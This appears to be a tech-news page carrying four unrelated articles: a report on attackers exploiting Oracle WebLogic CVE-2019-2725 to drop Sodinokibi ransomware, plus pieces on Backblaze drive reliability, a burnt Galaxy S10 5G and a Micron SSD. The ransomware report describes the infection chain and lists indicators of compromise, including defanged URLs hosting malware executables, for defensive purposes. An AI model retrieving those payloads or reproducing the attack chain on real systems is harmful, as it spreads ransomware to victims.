Hackers Exploiting Oracle WebLogic zero-day With New Ransomware To Encrypt User Data

Hackers exploiting the recently disclosed Oracle WebLogic Server remote code execution vulnerability to install a new variant of ransomware called “Sodinokibi.”

The vulnerability allows anyone with HTTP access to the server can carry out the attack without authentication. The vulnerability affects Oracle WebLogic Server, versions 10.3.6.0, 12.1.3.0, Oracle fixed the issue on April 26, and assigned it CVE-2019-2725.

According to Talos Investigation, the initial stages of attack performed on April 25, on the same day where the Oracle released the patch. On April 26 attackers establish a connection with different vulnerable HTTP servers.

Attackers leverage the vulnerability to download the ransomware copy from attackers controlled servers and they also infected some legitimate sources and repurposed it.

“Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 and the attackers were ultimately successful at encrypting a number of customer systems.”

The infection starts with the HTTP POST request which contains the PowerShell or certutil command to download the malicious files and execute it.

Oracle WebLogic

Once the infection triggered it executes the vssadmin.exe utility which adds shadowstorage that allows Windows to create a manual or automatic backup. The ransomware tries to delete the backup mechanism to stop the data recovery process.

The Ransom note directs victims to the .onion website and to a public domain (decryptor[.]top) which was registered on March 31.

Oracle WebLogic

The visited website asks victim’s to buy a decryptor software to decrypt the files. In order to buy it, victims to create a Bitcoin wallet and buy Bitcoin worth $2500. Then the bitcoins need to be transferred to attackers wallet address to download the decryptor software. Also, they avail an option to test the decryptor tool by uploading an encrypted image.

After Sodinokibi ransomware deployment attackers chose to distribute Gandcrab v5.2 again to the same victim, thinking their earlier attempts had been unsuccessful.

It is recommended to patch the CVE-2019-2725 vulnerability, you can find the security alert published by Oracle and the Patch Availability here.

Indicators of Compromise

Ransomware samples: 
0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d
34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160
74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac
95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05
fa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451

Distribution URLs:
hxxp://188.166.74[.]218/office.exe
hxxp://188.166.74[.]218/radm.exe
hxxp://188.166.74[.]218/untitled.exe
hxxp://45.55.211[.]79/.cache/untitled.exe

Attacker IP:
130.61.54[.]136

Attacker Domain:
decryptor[.]top
Read More

How reliable are modern hard drives?

If you want to know how reliable modern hard drives are, ask a company that uses a lot of them.

All hard drive manufacturers provide reliability data for their offerings, but if you want to really know how well they stand up to use, ask a company that uses a lot of them.

Cloud storage specialist Backblaze is a good example.

The good news is that Backblaze publishes quarterly stats and reliability data for the drives it uses, and this data gives us a glimpse into real-world storage reliability.

The data for Q1 2019 contains some interesting tidbits. For example, the cloud backup company has 106,238 hard drives in three data centers. 1,913 of those are boot drives, while the rest are used for storage.

With that many drives in use, trends start to stand out. For example, over the past three years, the annualized failure rates for Seagate and HGST have improved, with Seagate failure rate down 50 percent in that period.

Quarterly failure rates for Seagate and HGST hard drives.
Quarterly failure rates for Seagate and HGST hard drives.Backblaze

But it’s also interesting to note that Seagate failure rates have started to steadily increase over the past three quarters. Backblaze doesn’t yet have an explanation for this.

As for future data, Backblaze is looking to roll out at least twenty 20TB drives for testing by the end of 2019, along with at least one HAMR based drive from Seagate and/or one MAMRdrive from Western Digital.

Read More

Galaxy S10 5G bursts into flames, but Samsung refuses to take responsibility

One month after launching the Galaxy Note 7 in August 2016, Samsung was forced to suspend sales of the flagship phone when a manufacturing defect was discovered in its batteries that caused them to generate excessive heat and occasionally light on fire. After more problems were reported with the first batch of replacements, Samsung issued a second recall, and ceased production of the Galaxy Note 7 altogether, once and for all.

The catastrophic episode resulted in the company implementing a new eight-step testing and inspection process for its batteries in all future devices, and in the years since, there haven’t been any widespread issues of note. But even isolated incidents are enough to set off alarm bells following the Note 7 debacle.

This week, a South Korean Galaxy S10 5G owner posted photos of the phone scorched beyond recognition. He says  that he hadn’t done anything that would cause the S10 5G to combust, claiming it burnt “without [reason].”

“My phone was on the table when it started smelling burnt and smoke soon engulfed the phone,” the S10 5G owner, who asked to be identified by his last name, Lee, told AFP. “I had to drop it to the ground when I touched it because it was so hot.” He then added that “everything inside [the phone] was burnt.”

Samsung, unsurprisingly, refused to refund Lee for his ruined phone. The South Korean company told AFP that the damage to the phone was the result of an “external impact,” not an internal issue. Details surrounding the incident are rather scant from both Samsung and Lee, so until more comes of this, it’s hard to say whether or not the Galaxy S10 5G is actually problematic. That said, this is the first such burnt S10 5G we’ve heard of.

Read More

Micron’s new 15TB SSD is almost affordable

Ever so slightly closes price gap between high capacity SSDs and HDDs

The 15.36TB drive, which is a smidgen smaller in capacity than the largest hard disk drive currently on the market (a 16TB Toshiba HDD model), costs “only” €2.474,78 plus sales tax or around $2,770 (about £2,140). 

While that is far more expensive than smaller capacity SSDs (Silicon Power’s 1TB SSD retails for under $95 at Amazon), it is less than half the average price of competing enterprise SSDs like the Seagate Nytro 3330, the Western Digital Ultrastar DC SS530, the Toshiba PM5-R or the Samsung SSD PM1633a. 

HDD still wins the price/capacity comparison

And just for the comparison, a 14TB hard disk drive, the MG07 from Toshiba, retails for around $440, about a sixth of the price, which gives you an idea of the price gulf between the two. If you are looking for something bigger, then the Samsung SSD PM1643 is probably your only bet at €7294.22 excluding VAT.

Bear in mind that these are 2.5-inch models which are far smaller than 3.5-inch hard disk drives. They also connect to the host computer using a special connector called SAS (Serial Attached Small Computer System Interface). The Micron 9300 Pro connects via the U.2 PCIe (NVMe), offering read speeds of up to 3.5GBps.

For the ultimate data hoarder, there’s the Nimbusdata Exadrive which boasts a capacity of 100TB albeit in a 3.5-inch form factor.

Read More